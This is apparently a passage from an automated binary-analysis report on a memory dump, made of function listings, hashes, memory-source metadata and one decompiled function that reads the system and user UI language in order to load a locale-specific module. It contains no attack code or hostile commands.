0x00000000
0x100111d3
0x100111d5
0x100111d5
0x100111d8
0x100111d9
0x00000000
0x00000000
0x10011092
0x00000000
0x00000000
0x10011088
0x1001108a
0x00000000
0x00000000
0x100111f1
0x100111f8
0x100111f9
0x100111fb
0x100111fe
0x100111fe
0x100111fe
0x00000000
0x00000000
0x10011207
0x00000000
0x00000000
0x10011212
0x00000000
0x00000000
0x1001121b
0x1001121f
0x10011220
0x10011223
0x10011227
0x00000000
0x00000000
0x1001122e
0x00000000
0x00000000
0x10011238
0x10011231
0x10011231
0x1001120c
0x1001120c
0x00000000
0x00000000
0x1001123b
0x1001123d
0x1001123d
0x10011240
0x10011241
0x00000000
0x00000000
0x1001124f
0x10011252
0x10011255
0x10011258
0x10011244
0x10011244
0x10011248
0x00000000
0x00000000
0x1001125b
0x1001125f
0x00000000
0x00000000
0x10011269
0x1001126c
0x1001126c
0x1001126f
0x10011271
0x00000000
0x00000000
0x1001127d
0x10011280
0x10011283
0x10011286
0x10011289
0x1001128c
0x1001128f
0x10011292
0x100112a6
0x100112a7
0x00000000
0x100112a7
0x1001129a
0x1001129b
0x1001129e
0x00000000
0x00000000
0x100112ad
0x100111a4
0x100111a4
0x100111a6
0x00000000
0x00000000
0x100112b3
0x100112b4
0x100112b7
0x100112b9
0x00000000
0x00000000
0x10011061
0x10011064
0x10011067
0x1001106a
0x1001106b
0x1001106b
0x00000000
0x00000000
0x100112c0
0x100112c3
0x100112c4
0x10011276
0x10011276
0x10011277
0x10011201
0x10011201
0x00000000
0x00000000
0x100112c9
0x100112cc
0x100112cf
0x100112d2
0x100111dc
0x100111dc
0x100111dd
0x100111e0
0x100111e0
0x100111e2
0x00000000
0x00000000
0x100112d8
0x100112db
0x100112de
0x100112e1
0x100112e2
0x100112e6
0x100112e9
0x100112ea
0x100112ee
0x100112ef
0x100112f1
0x100112f3
0x10010ea7
0x10010ea7
0x10010ea9
0x00000000
0x00000000
0x00000000
0x00000000
0x100112fb
0x100112fe
0x10011301
0x10011304
0x10011305
0x10011309
0x1001130c
0x1001130d
0x10011311
0x10011312
0x10011314
0x00000000
0x00000000
0x00000000
0x00000000
0x1001131b
0x1001131d
0x1001131f
0x10011322
0x10011324
0x00000000
0x00000000
0x1001104b
0x1001104b
0x10011052
0x10011057
0x10011057
0x00000000
0x00000000
0x10011330
0x10011097
0x10011097
0x100113b8
0x100113b8
0x00000000
0x00000000
0x10011340
0x00000000
0x00000000
0x10011346
0x1001134a
0x00000000
0x00000000
0x10011354
0x10011357
0x10011358
0x1001135a
0x1001135d
0x1001135f
0x10011365
0x10011366
0x10011366
0x1001136b
0x1001136f
0x00000000
0x00000000
0x1001137e
0x10011382
0x100111c1
0x100111c1
0x100113bb
0x100113bb
0x100113bd
0x00000000
0x00000000
0x10011388
0x1001138b
0x1001138e
0x10011391
0x10011392
0x10011396
0x10011399
0x1001139a
0x10011374
0x10011374
0x00000000
0x00000000
0x100113a0
0x100113a3
0x100113a6
0x100113a9
0x100113aa
0x100113ae
0x100113b1
0x100113b2
0x10011375
0x10011375
0x10011377
0x00000000
0x00000000
0x10010fee
0x1001103c
0x1001103f
0x1001103f
0x1001103f
0x10011046
0x00000000
0x10011046
0x10010f6e
0x10010f70
0x10010f73
0x00000000
0x00000000
0x10010f75
0x10010f7b
0x10010f7e
0x10010f83
0x10010f85
0x00000000
0x00000000
0x10010f8b
0x10010f92
0x00000000
0x00000000
0x00000000
0x10010f94
0x10010eec
0x10010ef0
0x00000000
0x00000000
0x10010ef2
0x10010ef8
0x10010f02
0x10010f02
0x10010f08
0x10010f12
0x10010f18
0x10010f1b
0x00000000
0x00000000
0x10010f1d
0x10010f2b
0x10010f31
0x10010f33
0x00000000
0x00000000
0x00000000
0x10010f33
0x10010f0a
0x10010f10
0x00000000
0x00000000
0x00000000
0x10010f10
0x10010efa
0x10010f00
0x00000000
0x00000000
0x00000000
0x10010ed1
0x10010edc
0x10010ee1
0x10010ee3
0x10010e79
0x10010e79
0x100113dd
0x100113dd
0x100113e2
0x100113e7
0x100113e7
0x100113e9
0x100113f0
0x100113f7
0x10011059
0x1001105e
0x1001105e
0x00000000
0x10010ee3
0x10010ecf
0x10010e8a
0x10010e8d
0x10010e8f
0x00000000
0x00000000
0x10010e9a
0x10010e9b
0x10010e9c
0x10010ea1
0x00000000
0x10010ea1
0x10010e63
0x10010e68
0x10010e73
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 10010E42

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: b09d069520be3aa5f6654c0df25f12c495f49e588f4503014c6e11112af9e34e
Instruction ID: ca8024bc911d285c136c8d1e9e371564178fba6088d2d7ae9e56b9f5f09dcf73
Opcode Fuzzy Hash: b09d069520be3aa5f6654c0df25f12c495f49e588f4503014c6e11112af9e34e
Instruction Fuzzy Hash: 49F19E74604209EFEB19CF54CC81AEE7BA9EF08350F108519F855AF292DB74EA81DB60

Uniqueness

Uniqueness Score: -1.00%

Function 10016810, Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

LockResource.KERNEL32(?,?,?,1001689B,00000000,?,?,?,?,?,?,10001E78,?,?), ref: 1001681B

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: LockResource
String ID:
API String ID: 1236514755-0
Opcode ID: eccde21606e2e0b3735a6d75f1529513a7fa543e2c27058a6b28d0cf3e92e8a0
Instruction ID: b9e54fa48d36de5fcd469df0aa9a73f7dff31d87b817ace544cb0cd55e81e3ef
Opcode Fuzzy Hash: eccde21606e2e0b3735a6d75f1529513a7fa543e2c27058a6b28d0cf3e92e8a0
Instruction Fuzzy Hash: DDD0C936100328B7CF211F929C09E9B7F1EEB98AB1F048415FA194B260CA72D960D6A0

Uniqueness

Uniqueness Score: -1.00%

Function 048C6B25, Relevance: 1.5, Strings: 1, Instructions: 245COMMON

Download Yara Rule

Strings

%, xrefs: 048C6CA5

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: %
API String ID: 0-3264965323
Opcode ID: 2bac0b9661658c8c8461a3080d14abf6f12bea824a47e71fec4668ba19ae452a
Instruction ID: fcf1094fa5684dad322b44b8396d7ac9128b446e226540efd861160de9a358ce
Opcode Fuzzy Hash: 2bac0b9661658c8c8461a3080d14abf6f12bea824a47e71fec4668ba19ae452a
Instruction Fuzzy Hash: 18B16571108341CFD768CA25C48956FBBF1EB85308F408E2EE686A6260E772E949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 048D9DA1, Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

Ci,, xrefs: 048D9DCA

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: Ci,
API String ID: 0-192566918
Opcode ID: 9ae4172ff7da9d456a34c46e47dc7c4eaf51fd84b5f2acbfe5956b72a212561e
Instruction ID: 576f79d7792c49e75441d098b8941bae2e453bb541890c06a3f3af2157144df2
Opcode Fuzzy Hash: 9ae4172ff7da9d456a34c46e47dc7c4eaf51fd84b5f2acbfe5956b72a212561e
Instruction Fuzzy Hash: F1B130711093459FD768DF26C58951BBBE2FBC9708F108E1DF28696260D7B2A9098F43

Uniqueness

Uniqueness Score: -1.00%

Function 048C1C76, Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

p#[, xrefs: 048C1E12

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: p#[
API String ID: 0-3919597151
Opcode ID: 95bd53a8cd285bb78030567b64ba3a81a7881134e7ff1adfe1c1a355e542d212
Instruction ID: 118b50825fb9730d768c7d93493716c6b242f608dc70d2d67a51fa91948ed300
Opcode Fuzzy Hash: 95bd53a8cd285bb78030567b64ba3a81a7881134e7ff1adfe1c1a355e542d212
Instruction Fuzzy Hash: 325176715093019FC798CE25C58982BBBE1FBC4758F408E1DF586A6261DBB1EA09CF87

Uniqueness

Uniqueness Score: -1.00%

Function 048D406E, Relevance: 1.4, Strings: 1, Instructions: 136COMMON

Download Yara Rule

Strings

[B, xrefs: 048D4292

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: [B
API String ID: 0-3436147626
Opcode ID: a3ae6741022e1685c9b67d45ebb240180f37c3f176d35d3c19d9f155d4cd3eb7
Instruction ID: d9b8dfe6e3d2db15a3398cfafcdc275665012d45d5d763ed507946ae140fc03f
Opcode Fuzzy Hash: a3ae6741022e1685c9b67d45ebb240180f37c3f176d35d3c19d9f155d4cd3eb7
Instruction Fuzzy Hash: 6C5143725093429FC754CF25C88991FBBE5FBD8758F408A1CF18AA6160D3B5DA098F87

Uniqueness

Uniqueness Score: -1.00%

Function 048D78A5, Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

ID, xrefs: 048D78EF

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: ID
API String ID: 0-299066170
Opcode ID: 5b88523c4a8a29f1f8463c3ad97ac3549addcaf8d0952cc7dd13773f02622f43
Instruction ID: 2df0809d630e28fc50c63435ef9029fc6672bafd2d7b94b5067b92d1faf2b7cf
Opcode Fuzzy Hash: 5b88523c4a8a29f1f8463c3ad97ac3549addcaf8d0952cc7dd13773f02622f43
Instruction Fuzzy Hash: 6A41D03220E3429BC718CE24E58446FBBE1EBD4758F104E1EF9D6A6260D3749A49CB97

Uniqueness

Uniqueness Score: -1.00%

Function 048E0687, Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

Jd}, xrefs: 048E069B

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: Jd}
API String ID: 0-2909368870
Opcode ID: 375f760bc60cdf05572d8ee9cb941027e2c69033bf71ca4e0f4402854d73eeed
Instruction ID: 3586efb8edf7f35bb5dca20c0de33dd9273d1a6bc980ce47a749ec9d8ebf04cc
Opcode Fuzzy Hash: 375f760bc60cdf05572d8ee9cb941027e2c69033bf71ca4e0f4402854d73eeed
Instruction Fuzzy Hash: 154179716083428FC718DF2AC84552BBBE1FBC5748F544E2CF49696220E3B5EA09CF96

Uniqueness

Uniqueness Score: -1.00%

Function 048C3F5C, Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

[ , xrefs: 048C3FC0

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: [
API String ID: 0-603502248
Opcode ID: dd39e84ea7437609854c87625c3246c6dab2f383858189516709e63c83ec33d4
Instruction ID: 5af9b02ba9129aad6be0c83371133be6a1a6ccc0deb02c7bbd03571b678e95fe
Opcode Fuzzy Hash: dd39e84ea7437609854c87625c3246c6dab2f383858189516709e63c83ec33d4
Instruction Fuzzy Hash: 884179B26093119FC354DF69C88456BF7E0FF88718F414A2EE989D7250D774E908CB96

Uniqueness

Uniqueness Score: -1.00%

Function 048E1193, Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

Zc, xrefs: 048E11BD

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: Zc
API String ID: 0-1893601696
Opcode ID: 460722643652c2d26e6f0acc2054c1627bebfdbfebb164a59c5f1e01b163e435
Instruction ID: 90694942f1c60e89b1dd750bb58e2395502476244c6c04aac9676a258dd5ce0b
Opcode Fuzzy Hash: 460722643652c2d26e6f0acc2054c1627bebfdbfebb164a59c5f1e01b163e435
Instruction Fuzzy Hash: E93114B15083428F8718DF2AD94A41FBBE4FB88748F004E1EE596A6210D3B4DA0DCF97

Uniqueness

Uniqueness Score: -1.00%

Function 048DBEC9, Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

~O_, xrefs: 048DBF6D

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: ~O_
API String ID: 0-756777959
Opcode ID: db3090a45ae7c3739e898a1f80ef998c91600e0c0b12169495f342901a5e0f42
Instruction ID: 33f3e758dd4ed3b1d37b942341cff79d49e2201fbb7ef5a9782a79594bfd9249
Opcode Fuzzy Hash: db3090a45ae7c3739e898a1f80ef998c91600e0c0b12169495f342901a5e0f42
Instruction Fuzzy Hash: D5314471E0020CEBCF58CFA9C58A5EEBBB1FB44318F208599D415B7220D3B46A54CF90

Uniqueness

Uniqueness Score: -1.00%

Function 048D4D8D, Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

^@, xrefs: 048D4DFF

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: ^@
API String ID: 0-322773941
Opcode ID: 262d6f7a42c3e2db43ddbccf0926ae04e26865167014d134ba7cda9bf7d65114
Instruction ID: 51f9f25917c115b344caa06be4fa89b863fdd08516d116ca53719c20514c35bd
Opcode Fuzzy Hash: 262d6f7a42c3e2db43ddbccf0926ae04e26865167014d134ba7cda9bf7d65114
Instruction Fuzzy Hash: 063102B2D00209BBDF15CFE5C84A8DEBFB5FB89704F108189F924A6250D3B59A65DF90

Uniqueness

Uniqueness Score: -1.00%

Function 048C2309, Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

SV, xrefs: 048C233B

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: SV
API String ID: 0-4155469514
Opcode ID: f00fef317df2d5e84f42829febbb5efe71d29e8d9c20ebb668282f117ed05426
Instruction ID: fcc626bfd8f38a0cb504b11a68c8543ffaaf582852061e59fdda8aa6fe595ac9
Opcode Fuzzy Hash: f00fef317df2d5e84f42829febbb5efe71d29e8d9c20ebb668282f117ed05426
Instruction Fuzzy Hash: 3E31F2B0D0121AEBCF14DFE5D94A4EEBBB0FB00314F50859AD521AB250D7B5AA52CF81

Uniqueness

Uniqueness Score: -1.00%

Function 048DD6A7, Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73280ef74348667f9bb46682e7668155456b9c9d6ac80614f548d248d46e72e5
Instruction ID: dc4823c35a864971de1375cb6fc37ec94f5bcb3f8ade054a82c6a9e658f8ee84
Opcode Fuzzy Hash: 73280ef74348667f9bb46682e7668155456b9c9d6ac80614f548d248d46e72e5
Instruction Fuzzy Hash: 025145725093018FD348DF25D48940BBBE0BBD8768F144A2DF4D9A6220D7B4DA4A9F87

Uniqueness

Uniqueness Score: -1.00%

Function 048CFD91, Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66096b10ebe646ef78f9f5ec0eb4e12ed5071ff11f6d2eb90a8d1a0851188ca9
Instruction ID: b449556be97faa278d5162940c20aea4d47941f70ff9d59016a2b4fd2efebbb0
Opcode Fuzzy Hash: 66096b10ebe646ef78f9f5ec0eb4e12ed5071ff11f6d2eb90a8d1a0851188ca9
Instruction Fuzzy Hash: C431AB725083018BD304CF29C48541FFBE6ABC8768F448E5DE5D9AB261C7B4EA49CB56

Uniqueness

Uniqueness Score: -1.00%

Function 048C251C, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36e10174b51d4b30331d21f3fbdfa81fefeb3be805abc3d352bc035776b7cbd9
Instruction ID: 10e087eb2b854515c57f362b5f73d6785975f03bf92f5850081c853a52a3736d
Opcode Fuzzy Hash: 36e10174b51d4b30331d21f3fbdfa81fefeb3be805abc3d352bc035776b7cbd9
Instruction Fuzzy Hash: 0A3134B29083429BD354CF66D51841BFBE0FBC9718F108E5DF4E8A6250D3B8DA498F96

Uniqueness

Uniqueness Score: -1.00%

Function 048D43B3, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: bcc8409373ef627c86f161a76754b030ce0f7f61eab7cbf1456c27377132f306
Instruction ID: 60b3e6a45fed0085b327ce79b46f7271e95d3a2bb8cb21892c558f1f5cd2cbe1
Opcode Fuzzy Hash: bcc8409373ef627c86f161a76754b030ce0f7f61eab7cbf1456c27377132f306
Instruction Fuzzy Hash: 41212371D0120DEFCB48DFA9D9865AEBFF0FB40314F208599D805BA250E7B45B449F81

Uniqueness

Uniqueness Score: -1.00%

Function 048DDE10, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 10019D40, Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 158
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E10019D40(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t61;
				_Unknown_base(*)()* _t62;
				struct HINSTANCE__* _t63;
				struct HINSTANCE__* _t76;
				unsigned int _t79;
				signed short _t87;
				unsigned int _t88;
				_Unknown_base(*)()* _t95;
				signed short _t97;
				unsigned int _t98;
				signed int _t106;
				signed int _t118;
				signed int _t127;
				void* _t130;

				_push(0x15c);
				E10041D14(0x10052701, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t130 - 0x124)) =  *((intOrPtr*)(_t130 + 8));
				_t123 = 0;
				 *((intOrPtr*)(_t130 - 0x130)) =  *((intOrPtr*)(_t130 + 0xc));
				 *(_t130 - 0x120) = 0;
				 *(_t130 - 0x11c) = 0;
				_t61 = GetModuleHandleA("kernel32.dll");
				_t106 = GetProcAddress;
				 *(_t130 - 0x134) = _t61;
				_t62 = GetProcAddress(_t61, "GetUserDefaultUILanguage");
				if(_t62 == 0) {
					_t63 = GetModuleHandleA("ntdll.dll");
					if(_t63 != 0) {
						 *(_t130 - 0x120) = 0;
						EnumResourceLanguagesA(_t63, 0x10, 1, E100193D2, _t130 - 0x120);
						if( *(_t130 - 0x120) != 0) {
							_t79 =  *(_t130 - 0x120) & 0x0000ffff;
							_t123 = _t79 & 0x3ff;
							 *((intOrPtr*)(_t130 - 0x148)) = ConvertDefaultLocale(_t79 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t123);
							 *((intOrPtr*)(_t130 - 0x144)) = ConvertDefaultLocale(_t123);
							 *(_t130 - 0x11c) = 2;
						}
					}
				} else {
					_t87 =  *_t62() & 0x0000ffff;
					 *(_t130 - 0x120) = _t87;
					_t88 = _t87 & 0x0000ffff;
					_t123 = 0x3ff;
					_t118 = _t88 & 0x3ff;
					 *(_t130 - 0x11c) = _t118;
					 *((intOrPtr*)(_t130 - 0x148)) = ConvertDefaultLocale(_t88 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t118);
					 *((intOrPtr*)(_t130 - 0x144)) = ConvertDefaultLocale( *(_t130 - 0x11c));
					 *(_t130 - 0x11c) = 2;
					_t95 = GetProcAddress( *(_t130 - 0x134), "GetSystemDefaultUILanguage");
					if(_t95 != 0) {
						_t97 =  *_t95() & 0x0000ffff;
						 *(_t130 - 0x120) = _t97;
						_t98 = _t97 & 0x0000ffff;
						_t123 = _t98 & 0x3ff;
						 *((intOrPtr*)(_t130 - 0x140)) = ConvertDefaultLocale(_t98 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t123);
						 *((intOrPtr*)(_t130 - 0x13c)) = ConvertDefaultLocale(_t123);
						 *(_t130 - 0x11c) = 4;
					}
				}
				 *(_t130 - 0x11c) =  &(1[ *(_t130 - 0x11c)]);
				 *((intOrPtr*)(_t130 +  *(_t130 - 0x11c) * 4 - 0x148)) = 0x800;
				_t126 = 0x10000000;
				 *((char*)(_t130 - 0x13)) = 0;
				 *((char*)(_t130 - 0x14)) = 0;
				if(GetModuleFileNameA(0x10000000, _t130 - 0x118, 0x105) != 0) {
					_t123 = 0x20;
					_t106 = 0;
					E10041630(_t123, _t130 - 0x168, 0, _t123);
					 *(_t130 - 0x168) = _t123;
					 *((intOrPtr*)(_t130 - 0x160)) = _t130 - 0x118;
					 *((intOrPtr*)(_t130 - 0x154)) = 0x3e8;
					 *(_t130 - 0x14c) = 0x10000000;
					 *((intOrPtr*)(_t130 - 0x164)) = 0x88;
					E100193EC(_t130 - 0x12c, 0xffffffff);
					 *(_t130 - 4) = 0;
					if(E100194A3(_t130 - 0x12c, _t130 - 0x168) != 0) {
						E100194DD(_t130 - 0x12c);
					}
					_t127 = 0;
					if( *(_t130 - 0x11c) <= _t106) {
						L13:
						_t126 = 0;
						goto L15;
					} else {
						while(1) {
							_t76 = E100199B4( *((intOrPtr*)(_t130 - 0x124)),  *((intOrPtr*)(_t130 - 0x130)),  *((intOrPtr*)(_t130 + _t127 * 4 - 0x148)));
							if(_t76 != _t106) {
								_t126 = _t76;
								break;
							}
							_t127 =  &(1[_t127]);
							if(_t127 <  *(_t130 - 0x11c)) {
								continue;
							}
							goto L13;
						}
						L15:
						 *(_t130 - 4) =  *(_t130 - 4) | 0xffffffff;
						E10019A86(_t130 - 0x12c);
						goto L7;
					}
				}
				L7:
				return E10041D97(_t106, _t123, _t126);
			}

0x10019d40
0x10019d4a
0x10019d58
0x10019d61
0x10019d68
0x10019d6e
0x10019d74
0x10019d7a
0x10019d7c
0x10019d88
0x10019d8e
0x10019d92
0x10019e42
0x10019e46
0x10019e59
0x10019e5f
0x10019e6c
0x10019e6e
0x10019e89
0x10019e95
0x10019e9d
0x10019ea3
0x10019ea3
0x10019e6c
0x10019d98
0x10019da0
0x10019da3
0x10019da9
0x10019db1
0x10019dbb
0x10019dc4
0x10019dd2
0x10019de5
0x10019deb
0x10019df5
0x10019df9
0x10019e01
0x10019e04
0x10019e0a
0x10019e17
0x10019e23
0x10019e2b
0x10019e31
0x10019e31
0x10019df9
0x10019eb3
0x10019eb9
0x10019ed0
0x10019ed6
0x10019eda
0x10019ee6
0x10019ef2
0x10019ef4
0x10019efe
0x10019f14
0x10019f1a
0x10019f20
0x10019f2a
0x10019f30
0x10019f3a
0x10019f4c
0x10019f56
0x10019f5e
0x10019f5e
0x10019f63
0x10019f6b
0x10019f93
0x10019f93
0x00000000
0x10019f6d
0x10019f6d
0x10019f80
0x10019f88
0x10019f97
0x10019f97
0x10019f97
0x10019f8a
0x10019f91
0x00000000
0x00000000
0x00000000
0x10019f91
0x10019f99
0x10019f99
0x10019fa3
0x00000000
0x10019fa8
0x10019f6b
0x10019ee8
0x10019eed

APIs

__EH_prolog3_GS.LIBCMT ref: 10019D4A
GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,1001A011,?,?), ref: 10019D7A
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10019D8E
ConvertDefaultLocale.KERNEL32(?), ref: 10019DCA
ConvertDefaultLocale.KERNEL32(?), ref: 10019DD8
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10019DF5
ConvertDefaultLocale.KERNEL32(?), ref: 10019E20
